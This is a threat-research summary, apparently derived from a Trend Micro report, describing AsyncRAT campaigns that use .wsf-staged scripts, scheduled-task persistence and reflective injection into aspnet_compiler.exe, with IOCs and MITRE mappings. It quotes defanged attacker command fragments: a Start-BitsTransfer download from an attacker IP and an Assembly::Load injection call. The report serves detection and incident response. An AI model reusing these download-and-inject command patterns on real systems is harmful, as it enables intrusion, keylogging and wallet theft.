Threat Research

Analyzing AsyncRAT’s Code Injection into Aspnet_Compiler.exe Across Multiple Incident Response Cases

TrendMicro

Trend Micro MxDR investigated multiple AsyncRAT cases where attackers delivered a password‑protected ZIP containing a .wsf file that staged PowerShell/VBS/BAT scripts to download and extract a payload, then perform reflective process injection into the legitimate aspnet_compiler.exe. The chain established persistence via scheduled tasks and used dynamic DNS and socket-based C2 (e.g., 66escobar181[.]ddns[.]net) while enabling features such as keylogging. #AsyncRAT #aspnet_compiler.exe

Keypoints

  • User opens a password-protected ZIP (downloadedFile_SSAfnmeddOFzc.zip) containing downloadedFile_SSAfnmedd.wsf, which spawns wscript.exe and executes embedded PowerShell/VBScript/Batch commands.
  • The .wsf uses Start-BitsTransfer to retrieve snakers.zip from hxxp://185[.]81[.]157[.]246:222, which contains the multi-stage scripts and encoded payloads.
  • Scripting chain (Webcentral.vbs -> Webcentral.bat -> Webcentral.ps1 -> hash.vbs/hash.bat -> hash.ps1) creates scheduled tasks (Reklam/Rekill) to maintain persistence and run every two minutes.
  • hash.ps1 decodes runpe.txt and msg.txt, loads a .NET assembly (NewPE2.PE) and uses its Execute method to inject the decoded AsyncRAT payload into aspnet_compiler.exe via reflective loading.
  • The injected aspnet_compiler.exe establishes C2 via dynamic DNS domains (e.g., 66escobar181[.]ddns[.]net, httpswin10[.]kozow[.]com) and can enable capabilities like keylogging and system/crypto-wallet reconnaissance.
  • AMSI telemetry and Vision One alerts were used to pivot from network connections (45[.]141[.]215[.]40, 208[.]95[.]112[.]1) back to the initial downloaded archive and script execution chain.

MITRE Techniques

  • [T1055] Process Injection – Injected AsyncRAT into aspnet_compiler.exe using reflective loading invoked by a dynamically loaded .NET assembly (“[System.Reflection.Assembly]::Load($decoded_runpe_payload)…Invoke($null, [object[]](‘C:WindowsMicrosoft.NETFrameworkv4.0.30319aspnet_compiler.exe’, $decoded_msg_payload))”)
  • [T1086] PowerShell – Attackers used PowerShell to download, decode, and execute payload components and to run commands with bypassed execution policy (“powershell -command … Start-BitsTransfer -Source ‘hxxp://185[.]81[.]157[.]246:222/dd/mc.jpg’”)
  • [T1053.005] Scheduled Task – Persistence was achieved by creating Windows Task Scheduler entries named “Reklam” / “Rekill” to run scripts every two minutes (“creates a scheduled task that executes C:UsersPublichash.vbs … every two minutes”)
  • [T1105] Ingress Tool Transfer – Files were fetched from remote hosts using Start-BitsTransfer to save mc.jpg/snakers.zip to disk (“Start-BitsTransfer -Source ‘hxxp://185[.]81[.]157[.]246:222/dd/mc.jpg’ -Destination ‘C:UsersPublicsnakers.zip’”)
  • [T1204.002] User Execution: Malicious File – The initial .wsf was executed by the user (wscript launched via Explorer), indicating user interaction (“wscript.exe being initiated via Windows Explorer, suggesting that the user executed the file by double-clicking it.”)
  • [T1056.001] Input Capture: Keylogging – The AsyncRAT sample enabled a keylogging routine that captures keystrokes and logs them to %TEMP%Log.tmp (“the keylogging routine was enabled, which captures and records every keystroke of the infected machine”)

Indicators of Compromise

  • [IP address] Network and C2 context – 45[.]141[.]215[.]40 (dynamic DNS C2), 185[.]81[.]157[.]246 (download host), and other IPs such as 208[.]95[.]112[.]1
  • [Domain] C2 / infrastructure – 66escobar181[.]ddns[.]net, httpswin10[.]kozow[.]com (dynamic DNS used for C2 and obfuscation)
  • [File name] Initial and staged artifacts – downloadedFile_SSAfnmeddOFzc.zip, downloadedFile_SSAfnmedd.wsf, snakers.zip, msg.txt, runpe.txt (payload and injector files)
  • [SHA256 hash] Malware components – C:UsersPublicWebcentral.vbs (50b6aaed93609360f33de4b40b764d3bb0bd45d1), C:UsersPublicrunpe.txt (c07b2c25f926550d804087ac663991cf06bac519), and 6 more hashes listed in the source

Read below for a concise technical rewrite of the procedure focused on actions, artifacts, and execution flow.

In these incidents attackers delivered a password‑protected ZIP that contained a Windows Script File (.wsf). When the user double‑clicked the .wsf, wscript.exe spawned and executed embedded VBScript and PowerShell commands that created C:UsersPublicVLCdllFrame.xml, used Start-BitsTransfer to fetch mc.jpg (saved as snakers.zip) from hxxp://185[.]81[.]157[.]246:222, and expanded the archive to drop multiple scripts and two encoded PE blobs (msg.txt, runpe.txt).

The dropped components implement a staged loader: Webcentral.vbs/.bat chain launches Webcentral.ps1, which registers scheduled tasks named Reklam/Rekill to run every two minutes. Those tasks execute hash.vbs/hash.bat which call hash.ps1; hash.ps1 decodes runpe.txt and msg.txt, dynamically loads a .NET assembly (NewPE2.PE) from the decoded runpe payload, and invokes its Execute method to spawn aspnet_compiler.exe and inject the decoded AsyncRAT payload into that process (reflective loading), enabling stealthy execution under a legitimate binary.

Post‑injection activity includes socket‑based C2 using dynamic DNS domains (e.g., 66escobar181[.]ddns[.]net on port 6666 and httpswin10[.]kozow[.]com), runtime‑decrypted configuration that can enable keylogging and system/crypto‑wallet reconnaissance, and persistence via scheduled tasks. Detection pivots were made using AMSI telemetry (TELEMETRY_AMSI_EXECUTE) and Vision One alerts correlating aspnet_compiler.exe network connections (45[.]141[.]215[.]40, 208[.]95[.]112[.]1) back to the original downloaded archive and script chain.

Read more: https://www.trendmicro.com/en_us/research/23/l/analyzing-asyncrat-code-injection-into-aspnetcompiler-exe.html

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint